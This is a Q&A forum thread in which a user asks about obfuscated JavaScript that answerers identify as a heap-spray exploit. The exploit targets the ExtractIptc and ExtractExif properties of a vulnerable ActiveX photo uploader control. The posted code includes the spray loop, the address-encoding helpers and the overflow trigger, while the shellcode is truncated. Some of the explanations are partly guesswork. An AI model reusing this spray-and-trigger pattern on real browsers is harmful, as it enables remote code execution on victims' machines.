I don't understand this Code

Question

I do not understand this code snippet:

function ms(){ 
    var plc=unescape('".
    unescape( '\x43\x43\x43\x43\n.............\xEF'. $URL).CollectGarbage(); 
    if (mf)return(0);
    mf=1; 
    var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
    var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
    for(i=0;i<hb;i++) m[i]=ss+plc; 
    hav();
    return(1); 
    }  

In the above function I can't seem to figure out the variable types, or figure out what it's doing with the hsta variable, and what it's assigning to it:

var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;

I also can't figure out this function:

function fb(){
    try {
        var obj=null;
        obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');
        if(obj){
            ms();
            var buf = addr(0x0c0c0c0c);
            while (buf.length < 400) buf += buf;
            buf = buf.substring(0,400);
            obj.ExtractIptc = buf;
            obj.ExtractExif = buf;
            }
       } catch(e){}
    return 0;
    }

What does the following code mean?

cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}')

What kind of variable is this?

var buf = addr(0x0c0c0c0c);
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;

Most importantly, what is that code snippet trying to do?

Here are some more functions:

function hex(num,width){
    var digits='0123456789ABCDEF';
    var hex=digits.substr(num&0xF,1);
    while(num>0xF){
        num=num>>>4;
        hex=digits.substr(num&0xF,1)+hex;
        } 
    var width=(width?width:0);
    while(hex.length<width)hex='0'+hex;
    return hex; 
}

function addr(addr){
    return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));
    }

Any guidance would be appreciated.

Answer 1

It's a javascript snippet trying to exploit a security vulnerability related to Facebook, more specifically to its image uploader client side ActiveX control.

The cobj part tries to create an object of ClassID {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} which happens to be an ActiveX photo uploader control. The ExtractIptc and ExtractExif functions belong to that specific ActiveX control.

The core of the code is really memory address manipulation, shifting, using masks to separate high and low bits. For example, hex((addr>>16)&0xFFFF,4)) takes an address, shifts it 16 bits to the right, clears up the lower part and converts it to a hex number. To actually understand most of this code, you should have the right debugging tools.

Googling the {5C6698D9-7BE4-4122-8EC5-291D84DBD4A0} ClassID gave some interesting results you should look into:

http://www.kb.cert.org/vuls/id/776931

http://seclists.org/fulldisclosure/2008/Feb/0023.html

http://securitytracker.com/alerts/2008/Feb/1019297.html

Please note, this is not PHP. It's javascript.

More details...

cobj is probably translated into a CreateObject() call. Every registered ActiveX control has its own Class ID, and they have the form {0000000000-0000-0000-0000-000000000000} . When you want to refer to the registered library, and create an instance of it, you can use either its name or its Class ID.

The ActiveX control itself should be an.OCX or.DLL file on your computer. If you can find this file and debug it, you'll get most specific details about the ExtractIptc and ExtractExif functions. Again, those two functions seem to have vulnerabilities when called in a specific way, and this is what that script is trying to exploit.

The var hsta=0x0c0c0c0c part defines a variable hsta, equal to the hexadecimal number 0c0c0c0c. It's the same as writing var hsta = 202116108 . In computer engineering, it's easier to deal with hexadecimal addresses than decimal numbers since addresses and data inside the computer's memory is binary and can be directly represented as a hex number. More details about hexadecimal there: http://en.wikipedia.org/wiki/Hexadecimal .

The variable name hsta seems to be in hungarian notation (first letter represents the variable type - h for hex). I would therefore assume it means hexadecimal start address (hsta). Following the same train of thought, my guess would be that pl means payload and plc means payload code.

The payload code is the code the computer will execute if the exploit was successful, and it's what you see at the beginning of the script (\x43\x43\x43\x43\n....\xEF) . It's encoded as shell code for a particular CPU architecture and operating system. That means code that's already compiled, standalone, and can be piped to the CPU directly. If you decode this, you'll probably find something close to machine code. It's probably nothing positive.

The hex(num,width) function converts a decimal number to its hexadecimal form. I've tested the function separately, and it returned 3E8 when feeding it 1000. The width variable is simply used to exit the script if the resulting hexadecimal number is bigger than specified.

About this part:

var buf = addr(0x0c0c0c0c);
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;

The buf variable is a buffer. A buffer is nothing more than data in memory. It can be interfaced as a string, as shown in this code. My guess is that a buffer of 400 bytes is created from whatever contents is in memory at 0x0c0c0c0c, and then fed into two functions.

There are several function definitions missing in here. Namely, the hav() function.

Answer 2

I fixed the formatting as much as I could, but there still seem to be chunks missing. At least, I'm seeing syntax errors, uninitialized variables, etc.

If this is actual working code please edit your question and (using the "code" button "101/010" or just indenting 4 spaces rather than quoting with the '"' button) post the actual code so that what we see matches what you are seeing. EDIT: DON'T TRY TO RUN THIS CODE. its probably malicious.

If it isn't working code, there's your answer: it doesn't work, so trying to figure out how it works doesn't make sense.